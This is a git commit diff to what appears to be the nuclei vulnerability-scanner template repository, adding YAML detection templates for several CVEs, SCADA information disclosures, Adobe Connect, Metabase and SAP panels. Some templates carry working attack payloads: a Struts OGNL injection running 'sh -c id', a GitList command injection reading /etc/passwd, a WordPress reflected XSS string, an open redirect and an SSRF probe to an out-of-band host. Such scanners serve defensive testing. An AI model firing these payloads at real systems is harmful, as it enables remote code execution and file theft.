Merge remote-tracking branch 'origin/master' into skar4444

patch-1
Suman Kar 2021-06-16 21:15:54 +05:30
commit b9c59c18a3
17 changed files with 371 additions and 12 deletions

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 338 | vulnerabilities | 180 | exposed-panels | 148 |
| takeovers | 67 | exposures | 107 | technologies | 100 |
| cves | 344 | vulnerabilities | 182 | exposed-panels | 149 |
| takeovers | 67 | exposures | 107 | technologies | 103 |
| misconfiguration | 68 | workflows | 32 | miscellaneous | 24 |
| default-logins | 30 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 8 | iot | 13 |
| fuzzing | 10 | helpers | 9 | iot | 13 |
**115 directories, 1280 files**.
**118 directories, 1295 files**.
</td>
</tr>

View File

@ -0,0 +1,20 @@
id: CVE-2013-2248
info:
name: Apache Struts - Multiple Open Redirection Vulnerabilities
author: 0x_Akoko
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/38666
severity: low
tags: cve,cve2013,apache,redirect,struts
requests:
- method: GET
path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -2,7 +2,7 @@ id: CVE-2013-2251
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation,dwisiswant0
author: exploitation,dwisiswant0,alex
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
@ -29,6 +29,13 @@ requests:
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
matchers-condition: and
matchers:
- type: status
@ -39,10 +46,4 @@ requests:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: word
words:
- "There is no Action mapped for namespace"
- "The origin server did not find a current representation for the target resource"
- "Apache Tomcat"
condition: or
part: body

View File

@ -0,0 +1,39 @@
id: CVE-2018-1000533
info:
name: GitList < 0.6.0 RCE
author: pikpikcu
severity: critical
description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
tags: rce,git,cve,cve2018,gitlist
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '<span class="name">(.*?)</span>'
matchers:
- type: word
words:
- "root:/root:/bin/bash"
part: body

View File

@ -0,0 +1,28 @@
id: CVE-2018-16668
info:
name: CirCarLife SCADA Installation Paths
description: System software installation path disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/html/repository"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "** Platform sources **"
- "** Application sources **"
condition: and

View File

@ -0,0 +1,28 @@
id: CVE-2018-16670
info:
name: CirCarLife SCADA PLC Status
description: PLC status disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/services/user/values.xml?var=STATUS"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "<values><variable><id>"
- "Reader.STATUS"
condition: and

View File

@ -0,0 +1,30 @@
id: CVE-2018-16671
info:
name: CirCarLife SCADA Device ID
description: System software information disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/html/device-id"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "circontrol"
- type: regex
part: body
regex:
- "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"

View File

@ -14,6 +14,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
matchers-condition: and
matchers:

View File

@ -0,0 +1,34 @@
id: CVE-2021-24237
info:
author: 0x_Akoko
name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
severity: medium
tags: cve,cve2021,realteo,xss,wordpress
reference: |
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests:
- method: GET
path:
- '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "autofocus onfocus=alert(/{{randstr}}/);//"
- "Nothing found"
part: body
condition: and
- type: word
words:
- "text/html"
part: header

View File

@ -0,0 +1,23 @@
id: adobe-connect-central-login
info:
name: Adobe Connect Central Login
author: dhiyaneshDk
severity: info
tags: adobe,panel
requests:
- method: GET
path:
- "{{BaseURL}}/system/login"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Adobe Connect Central Login</title>'
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: adobe-connect-username-exposure
info:
name: Adobe Connect Username Exposure
reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
author: dhiyaneshDk
severity: low
tags: adobe,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/system/help/support"
matchers-condition: and
matchers:
- type: word
words:
- 'Administrators name:'
- 'Support Administrators email address:'
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: adobe-connect-version
info:
name: Adobe Connect Central Version
author: dhiyaneshDk
severity: info
tags: adobe
requests:
- method: GET
path:
- "{{BaseURL}}/version.txt"
matchers-condition: and
matchers:
- type: word
words:
- 'package='
part: body
- type: word
words:
- 'text/plain'
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: metabase-version-detect
info:
name: Detect Metabase Version
author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Metabase</title>"
- "window.MetabaseBootstrap"
- "window.MetabaseRoot"
part: body
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '"(v\d+.\d+.\d+)"'

View File

@ -0,0 +1,27 @@
id: sap-web-dispatcher-admin-portal
info:
name: SAP Web Dispatcher admin portal detection
author: randomstr1ng
description: Detection of SAP Web Dispatcher Admin Portal
severity: info
tags: sap,webserver,proxy
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/sap/wdisp/admin/public/default.html"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "SAP NetWeaver Application Server"
- type: word
part: body
words:
- "<title>Administration</title>"

View File

@ -0,0 +1,21 @@
id: sap-web-dispatcher-detection
info:
name: SAP Web Dispatcher detection
author: randomstr1ng
description: Detection of SAP Web Dispatcher service
severity: info
tags: sap,webserver,proxy
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/inormalydonotexist"
matchers:
- type: word
part: body
words:
- "This error page was generated by SAP Web Dispatcher"

View File

@ -0,0 +1,21 @@
id: confluence-ssrf-sharelinks
info:
name: Confluence SSRF in sharelinks
author: TechbrunchFR
severity: medium
description: Vulnerable should be Confluence versions released from 2016 November and older
reference: |
- https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
- https://github.com/assetnote/blind-ssrf-chains#confluence
tags: confluence,atlassian,ssrf,jira,oob
requests:
- method: GET
path:
- '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

View File

@ -32,6 +32,7 @@ workflows:
- template: cves/2020/CVE-2020-35951.yaml
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: cves/2021/CVE-2021-24237.yaml
- template: cves/2021/CVE-2021-24176.yaml
- template: cves/2021/CVE-2021-24285.yaml
- template: cves/2021/CVE-2021-24316.yaml